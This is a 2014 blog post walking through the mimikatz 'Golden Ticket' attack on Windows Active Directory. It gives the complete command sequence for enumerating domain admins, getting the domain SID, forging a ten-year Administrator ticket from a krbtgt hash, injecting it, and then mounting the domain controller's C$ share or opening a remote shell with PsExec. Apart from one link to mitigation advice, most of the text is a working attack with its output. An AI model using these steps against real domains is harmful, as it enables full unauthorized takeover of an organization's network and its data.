mimikatz - Golden Ticket

Introduction

We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain.

Here is the list of what you need to make it work:
  • krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)
  • Domain name
  • Domain's SID
  • Username that we'd like to impersonate

    As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.
    As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info.

    Attack


    When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example:
    First we look for a domain administrator:
    C:\Users\evilhacker>net group "domain admins" /domain
    The request will be processed at a domain controller for domain ctu.domain.
    
    Group name     Domain Admins
    Comment        Designated administrators of the domain
    
    Members
    
    -------------------------------------------------------------------------------
    Administrator         schema.Admin       Jack.Bauer
    

    Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. Easiest way to do that is just use: "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe come in handy:

    C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN
    
    PsGetSid v1.44 - Translates SIDs to names and vice versa
    Copyright (C) 1999-2008 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    SID for CTU.DOMAIN\CTU.DOMAIN:
    S-1-1-12-123456789-1234567890-123456789
    

    Now we have everything to start the attack. First we list the existing Kerberos tickets, if there is any we can those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that.

    C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe
    
      .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                    with  14 modules * * */
    
    
    mimikatz # kerberos::list
    
    [00000000] - 17
       Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014
    11:23:28 AM
       Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
       Client Name       : evilhacker @ CTU.DOMAIN
       Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
    ...
    
    mimikatz # kerberos::purge
    Ticket(s) purge for current session is OK
    
    mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
    Admin  : Administrator
    Domain : CTU.DOMAIN
    SID    : S-1-1-12-123456789-1234567890-123456789
    krbtgt : deadbeefboobbabe003133700009999
    Ticket : Administrator.kiribi
    
     * PAC generated
     * PAC signed
     * EncTicketPart generated
     * EncTicketPart encrypted
     * KrbCred generated
    
    Final Ticket Saved to file !
    
    mimikatz # kerberos::ptt Administrator.kiribi
    Ticket 'Administrator.kiribi' successfully submitted for current session
    
    mimikatz # kerberos::list
    
    [00000000] - 17
       Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034
     12:52:13 PM
       Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
       Client Name       : Administrator @ CTU.DOMAIN
       Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
    
    mimikatz # kerberos::tgt
    Keberos TGT of current session :
               Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1
    /24/2034 12:52:13 PM
               Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN
               Target Name  (--) : @ CTU.DOMAIN
               Client Name  (01) : Administrator ; @ CTU.DOMAIN
               Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
    
               Session Key  (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
               Ticket  (00 - 17) : [...]
    (NULL session key means allowtgtsessionkey is not set to 1)
    
    Now you can mount any share or use any RPC related tool that you like.
    
    C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
    The command completed successfully.
    
    
    C:\Users\evilhacker\Documents\mimikatz>net use
    New connections will be remembered.
    
    
    Status       Local     Remote                    Network
    
    -------------------------------------------------------------------------------
    OK           I:        \\dc01.ctu.domain\c$
                                                    Microsoft Windows Network
    The command completed successfully.
    

    OR

    C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe
    
    PsExec v2.0 - Execute processes remotely
    Copyright (C) 2001-2013 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>hostname
    DC01
    
    C:\Windows\system32>exit
    cmd.exe exited on dc01.ctu.domain\ with error code 0.
    

    Some additional notes:
  • Password change on behalf of the user does not have any impact on the ticket, the access can be granted without the user's password (or hash)
  • Mimikatz does not support other user than a Domain Admin (it is hardcoded in the source), by the way I managed to impersonate a domain controller //with some malfunctions.
  • The TGT ticket is issued for 10 years and can be renewed for more 10 years
  • Existing sessions cannot be overridden. Already attached shares have to be detached first and reattached again.
  • Cached tickets sometimes cannot be purged so the computer has to be restarted (for example if there is a group policy that attaches different shares then those shares cannot be mounted as the impersonated user)
  • Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT

    Mitigation


    A good mitigation how-to from CERT-EU: Protection from Kerberos Golden Ticket

    Greetings


    Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz ;)

    Author

    Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - http://rycon.hu/ - 2014. 01. 24.